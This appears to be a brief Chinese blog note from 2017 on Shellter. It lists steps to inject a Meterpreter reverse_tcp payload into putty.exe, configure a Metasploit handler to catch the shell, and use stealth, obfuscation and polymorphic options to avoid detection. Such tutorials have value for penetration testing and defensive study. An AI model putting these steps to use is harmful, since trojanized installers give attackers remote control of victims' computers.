shllter自动和手动实例

加壳:

  1. wineconsole shellter
  2. A,选自动
  3. 将putty.exe移到/usr/share/shllter/目录,PE设置为putty.exe
  4. LHOST,LPORT

监视:

  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set LHOST,LPORT
  4. exploit

手动模式翻译:
gather dynamic thread context info?收集动态线程信息?
number of instructions: 指令数字
check for selfmodifying code while tracing?
stealth mode 隐身模式
obfuscate shellter`s decoder 模糊解码器
enable user defined encoding sequence? 打开用户定义的编码顺序
prepend polymorphic code 预处理多态编码
size of polycode(approx大概):20-10000Bytes

posted @ 2017-02-15 09:15  itholiday  阅读(254)  评论(0编辑  收藏  举报